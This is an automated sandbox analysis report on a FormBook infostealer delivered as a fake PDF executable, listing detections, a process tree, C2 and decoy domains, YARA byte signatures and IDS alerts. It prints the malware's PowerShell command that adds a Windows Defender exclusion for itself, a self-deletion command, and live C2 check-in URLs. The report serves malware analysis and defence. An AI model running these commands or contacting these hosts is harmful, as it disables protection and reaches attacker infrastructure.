Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER_1105-19-24-3537.pdf.exe

Overview

General Information

Sample name:ORDER_1105-19-24-3537.pdf.exe
Analysis ID:1515805
MD5:a2082543a1c1028dd0a613a6a2af4d21
SHA1:b6fff58598fad2366a05c18d2d3ccf00f7403391
SHA256:ee118f8e57acfa0e476638a011ed8d6664d1499e1b326180e21e6f9834ea93e0
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ORDER_1105-19-24-3537.pdf.exe (PID: 6508 cmdline: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe" MD5: A2082543A1C1028DD0A613A6A2AF4D21)
    • powershell.exe (PID: 576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2320 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • ORDER_1105-19-24-3537.pdf.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe" MD5: A2082543A1C1028DD0A613A6A2AF4D21)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • rundll32.exe (PID: 1576 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
          • cmd.exe (PID: 576 cmdline: /c del "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.laske.xyz/rn94/"], "decoy": ["st68v.xyz", "conciergenotary.net", "qwechaotk.top", "rtpdonatoto29.xyz", "8ad.xyz", "powermove.top", "cameras-30514.bond", "vanguardcoffee.shop", "umoe53fxc1bsujv.buzz", "consultoriamax.net", "hplxx.com", "ndu.wtf", "yzh478c.xyz", "bigbrown999.site", "xiake07.asia", "resdai.xyz", "the35678.shop", "ba6rf.rest", "ceo688.com", "phimxhot.xyz", "010101-11122-2222.cloud", "champion-casino-skw.buzz", "laku77.bar", "popumail.net", "stargazerastrology.click", "beauty.university", "t460.top", "sparkyos.app", "day2go.net", "minrungis.shop", "cognigrid.com", "abandoned-houses-39863.bond", "liderparti.store", "hinet.tech", "moviemax.live", "business-printer-22001.bond", "yakintv.pro", "longmaosol.xyz", "hello4d.dev", "vestircool.store", "surpriseinside.net", "betflixfan.asia", "ln2m1.shop", "5302mcavt.website", "conf-contact.online", "31140.ooo", "bdkasinoxox.xyz", "nicoleb.tech", "mainz-cruise-deals.today", "run-run.tokyo", "practicalfranchises.info", "usmanovbanki-uz.space", "superlottery.top", "zabbet911.bet", "ambassadorshipvottings.click", "sangforln.tech", "expertoffersusa.lat", "plong.cloud", "cryptoautomata.dev", "dq33xa.xyz", "handtools-16660.bond", "24763wbk.hair", "sportswear-30530.bond", "lusuidnx.shop"]}
SourceRuleDescriptionAuthorStrings
00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 25 entries
      SourceRuleDescriptionAuthorStrings
      4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18839:$sqlite3step: 68 34 1C 7B E1
          • 0x1894c:$sqlite3step: 68 34 1C 7B E1
          • 0x18868:$sqlite3text: 68 38 2A 90 C5
          • 0x1898d:$sqlite3text: 68 38 2A 90 C5
          • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe, NewProcessName: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe, OriginalFileName: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", ProcessId: 6508, ProcessName: ORDER_1105-19-24-3537.pdf.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", ParentImage: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe, ParentProcessId: 6508, ParentProcessName: ORDER_1105-19-24-3537.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", ProcessId: 576, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1028, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 1576, ProcessName: rundll32.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", ParentImage: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe, ParentProcessId: 6508, ParentProcessName: ORDER_1105-19-24-3537.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", ProcessId: 576, ProcessName: powershell.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", ParentImage: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe, ParentProcessId: 6508, ParentProcessName: ORDER_1105-19-24-3537.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", ProcessId: 576, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-23T14:38:29.395285+020020314531Malware Command and Control Activity Detected192.168.2.5497213.33.130.19080TCP
          2024-09-23T14:39:16.104025+020020314531Malware Command and Control Activity Detected192.168.2.549716185.53.179.9080TCP
          2024-09-23T14:39:56.698099+020020314531Malware Command and Control Activity Detected192.168.2.549718162.0.209.780TCP
          2024-09-23T14:40:17.342637+020020314531Malware Command and Control Activity Detected192.168.2.54971923.227.38.7480TCP
          2024-09-23T14:40:58.694135+020020314531Malware Command and Control Activity Detected192.168.2.549720154.21.81.14280TCP
          2024-09-23T14:42:20.275189+020020314531Malware Command and Control Activity Detected192.168.2.54972213.248.252.11480TCP
          2024-09-23T14:42:40.656006+020020314531Malware Command and Control Activity Detected192.168.2.54972335.214.167.2480TCP
          2024-09-23T14:43:02.401051+020020314531Malware Command and Control Activity Detected192.168.2.54972450.87.178.23880TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://www.qwechaotk.top/rn94/www.ln2m1.shopAvira URL Cloud: Label: phishing
          Source: http://www.practicalfranchises.info/rn94/Avira URL Cloud: Label: malware
          Source: http://www.bigbrown999.site/rn94/www.bdkasinoxox.xyzAvira URL Cloud: Label: malware
          Source: http://www.yzh478c.xyz/rn94/Avira URL Cloud: Label: malware
          Source: http://www.bigbrown999.site/rn94/Avira URL Cloud: Label: malware
          Source: http://www.longmaosol.xyzAvira URL Cloud: Label: malware
          Source: http://www.laske.xyz/rn94/www.run-run.tokyoAvira URL Cloud: Label: malware
          Source: http://www.practicalfranchises.info/rn94/www.yzh478c.xyzAvira URL Cloud: Label: malware
          Source: http://www.qwechaotk.topAvira URL Cloud: Label: phishing
          Source: http://www.qwechaotk.top/rn94/?jDHh=Fx60rCVvY/PfTPS+x0Yy+mO10iBB7HzlvlxbYnAbTZ/GodXDJ0QLvzTZw6Pc1HX1Gik3&9r9Hc=ytxTjD5hRxAAvira URL Cloud: Label: phishing
          Source: http://www.bdkasinoxox.xyz/rn94/?9r9Hc=ytxTjD5hRxA&jDHh=I5NiMU91ItirT7qNKaN02XXkh1pCEM2b67jBRcxD66PzibDnIUK5R57IVHBUjGxrStSpAvira URL Cloud: Label: malware
          Source: http://www.010101-11122-2222.cloud/rn94/www.longmaosol.xyzAvira URL Cloud: Label: phishing
          Source: http://www.ln2m1.shop/rn94/www.practicalfranchises.infoAvira URL Cloud: Label: malware
          Source: http://www.ln2m1.shop/rn94/Avira URL Cloud: Label: malware
          Source: http://www.010101-11122-2222.cloudAvira URL Cloud: Label: phishing
          Source: http://www.run-run.tokyo/rn94/www.010101-11122-2222.cloudAvira URL Cloud: Label: malware
          Source: www.laske.xyz/rn94/Avira URL Cloud: Label: malware
          Source: http://www.laske.xyz/rn94/Avira URL Cloud: Label: malware
          Source: http://www.run-run.tokyo/rn94/Avira URL Cloud: Label: malware
          Source: http://www.yzh478c.xyz/rn94/www.hinet.techAvira URL Cloud: Label: malware
          Source: http://www.qwechaotk.top/rn94/Avira URL Cloud: Label: phishing
          Source: http://www.010101-11122-2222.cloud/rn94/Avira URL Cloud: Label: phishing
          Source: http://www.bdkasinoxox.xyz/rn94/www.day2go.netAvira URL Cloud: Label: malware
          Source: http://www.bdkasinoxox.xyz/rn94/Avira URL Cloud: Label: malware
          Source: http://www.longmaosol.xyz/rn94/Avira URL Cloud: Label: malware
          Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.laske.xyz/rn94/"], "decoy": ["st68v.xyz", "conciergenotary.net", "qwechaotk.top", "rtpdonatoto29.xyz", "8ad.xyz", "powermove.top", "cameras-30514.bond", "vanguardcoffee.shop", "umoe53fxc1bsujv.buzz", "consultoriamax.net", "hplxx.com", "ndu.wtf", "yzh478c.xyz", "bigbrown999.site", "xiake07.asia", "resdai.xyz", "the35678.shop", "ba6rf.rest", "ceo688.com", "phimxhot.xyz", "010101-11122-2222.cloud", "champion-casino-skw.buzz", "laku77.bar", "popumail.net", "stargazerastrology.click", "beauty.university", "t460.top", "sparkyos.app", "day2go.net", "minrungis.shop", "cognigrid.com", "abandoned-houses-39863.bond", "liderparti.store", "hinet.tech", "moviemax.live", "business-printer-22001.bond", "yakintv.pro", "longmaosol.xyz", "hello4d.dev", "vestircool.store", "surpriseinside.net", "betflixfan.asia", "ln2m1.shop", "5302mcavt.website", "conf-contact.online", "31140.ooo", "bdkasinoxox.xyz", "nicoleb.tech", "mainz-cruise-deals.today", "run-run.tokyo", "practicalfranchises.info", "usmanovbanki-uz.space", "superlottery.top", "zabbet911.bet", "ambassadorshipvottings.click", "sangforln.tech", "expertoffersusa.lat", "plong.cloud", "cryptoautomata.dev", "dq33xa.xyz", "handtools-16660.bond", "24763wbk.hair", "sportswear-30530.bond", "lusuidnx.shop"]}
          Source: nicoleb.techVirustotal: Detection: 11%Perma Link
          Source: practicalfranchises.infoVirustotal: Detection: 11%Perma Link
          Source: ORDER_1105-19-24-3537.pdf.exeReversingLabs: Detection: 68%
          Source: ORDER_1105-19-24-3537.pdf.exeVirustotal: Detection: 70%Perma Link
          Source: Yara matchFile source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: ORDER_1105-19-24-3537.pdf.exeJoe Sandbox ML: detected
          Source: ORDER_1105-19-24-3537.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: ORDER_1105-19-24-3537.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: NgWS.pdb source: ORDER_1105-19-24-3537.pdf.exe
          Source: Binary string: wntdll.pdbUGP source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2166507711.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2169166091.0000000004784000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ORDER_1105-19-24-3537.pdf.exe, ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000008.00000003.2166507711.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2169166091.0000000004784000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166313350.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166669799.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166313350.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166669799.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: NgWS.pdbSHA256 source: ORDER_1105-19-24-3537.pdf.exe
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4x nop then jmp 076135E3h0_2_07612CDC
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4x nop then jmp 076135E3h0_2_07612C8B
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4x nop then jmp 076135E3h0_2_076133D8
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4x nop then jmp 076135E3h0_2_076131ED
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4x nop then pop edi4_2_00417AFD
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4x nop then pop edi4_2_00417BD9
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4x nop then pop edi4_2_00417BF6
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4x nop then pop edi4_2_00416CDB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi8_2_007A7AFD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi8_2_007A7BF6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi8_2_007A7BD9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi8_2_007A6CDB

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49720 -> 154.21.81.142:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49723 -> 35.214.167.24:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49719 -> 23.227.38.74:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49719 -> 23.227.38.74:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49718 -> 162.0.209.7:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49718 -> 162.0.209.7:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49720 -> 154.21.81.142:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49720 -> 154.21.81.142:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49718 -> 162.0.209.7:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49719 -> 23.227.38.74:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49724 -> 50.87.178.238:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49716 -> 185.53.179.90:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49716 -> 185.53.179.90:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49723 -> 35.214.167.24:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49724 -> 50.87.178.238:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49723 -> 35.214.167.24:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49724 -> 50.87.178.238:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49716 -> 185.53.179.90:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49722 -> 13.248.252.114:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49722 -> 13.248.252.114:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49722 -> 13.248.252.114:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49721 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49721 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49721 -> 3.33.130.190:80
          Source: Malware configuration extractorURLs: www.laske.xyz/rn94/
          Source: DNS query: www.bdkasinoxox.xyz
          Source: DNS query: www.yzh478c.xyz
